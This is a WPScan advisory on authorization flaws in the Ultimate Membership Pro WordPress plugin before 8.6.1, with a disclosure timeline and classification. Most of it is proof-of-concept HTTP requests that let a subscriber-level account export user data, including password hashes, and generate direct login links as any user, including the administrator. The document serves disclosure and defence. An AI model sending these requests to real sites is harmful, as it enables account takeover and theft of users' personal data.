Ultimate Membership Pro < 8.6.1 - Multiple Critical Vulnerabilities



Description
Multiple Critical Vulnerabilities found in Ultimate Membership Pro could leads to Authenticated (using a low privilege account, such as subscriber) Remote Code Execution on default Installation, as well as PII disclosure (such as emails, IP addresses, hashed passwords, usernames, User-Agent and so on), due to lack of authorisation checks.

Edit (WPScanTeam):
February 3rd, 2020 - Report Received & Envato Contacted
February 4th, 2020 - Envato Investigating
February 4th, 2020 - v8.6.1 released, devs replied (via Envato) that the issues were due to the nulled plugin used by the researcher. We can confirm that the issues were valid and not due to a nulled plugin liked claimed. Furthermore, the attempted fixes are not sufficient enough and Envato has been notified again.
Proof of Concept
All vulnerabilities require at least a subscriber account.
===============================================================================================================================
1. Export Settings, Postmeta And Users Data Including Passwords Hashes And User Roles, As a Low Privileged User i.e. subscriber (in versions <= 8.6)
===============================================================================================================================


-------------------------------------------
Request Headers To Dump Export File (Start)
-------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_make_export_file&import_users=1&import_settings=1&import_postmeta=1
-----------------------------------------
Request Headers To Dump Export File (End)
-----------------------------------------


Response from above request throws XML File URL that contains the critical data i.e. like following
http://example.com/wordpress/wp-content/plugins/indeed-membership-pro/export.xml

Following tables are fetched in that XML File

wp_users
wp_usermeta
wp_ihc_orders
wp_ihc_orders_meta
wp_ihc_security_login
wp_ihc_user_levels
wp_ihc_user_logs
wp_indeed_members_payments
wp_options
wp_ihc_notifications
wp_ihc_invitation_codes
wp_ihc_coupons
wp_ihc_debug_payments
wp_ihc_gift_templates
wp_ihc_taxes
wp_postmeta


===================================================================================================
2. Login As Any Registered User In Database Including Administrator, By Just Knowing Username or ID (in versions 7.3 to 8.6)
===================================================================================================


-------------------------------------------------
Request Headers To Login Through Username (Start)
-------------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_generate_direct_link&username=admin
-----------------------------------------------
Request Headers To Login Through Username (End)
-----------------------------------------------


Response from above request will throw a Link which upon opening, leads to direct administrator login without requiring any credentials i.e. following
http://example.com/wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791


-------------------------------------------
Request Headers To Login Through ID (Start)
-------------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: {subscriber cookies}

action=ihc_generate_direct_link_by_uid&uid=1
-----------------------------------------
Request Headers To Login Through ID (End)
-----------------------------------------


Response from above request will throw a Link which upon opening, leads to direct administrator login without requiring any credentials i.e. following
http://example.com/wordpress/?ihc_action=dl&token=94bb1bcba42feb2e19565a44b3d96838fef9e791


To make it more efficient, Username or ID of Administrator can also be extracted through the 1st vulnerability i.e. export.xml because it contains Usernames, IDs and their Roles.

Affects Plugin

fixed in version 8.6.1

References

URL https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253
URL https://blog.wpscan.org/wpvulndb/report/2020/03/06/ultimate-membership-pro-recent-vulnerabilities-breakdown.html

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Noman Riffat
Submitter Noman Riffat
Submitter Twitter nomanriffat
Views 4167
Verified No
WPVDB ID 10061

Timeline

Publicly Published 2020-02-06 (about 2 months ago)
Added 2020-02-06 (about 2 months ago)
Last Updated 2020-03-07 (25 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin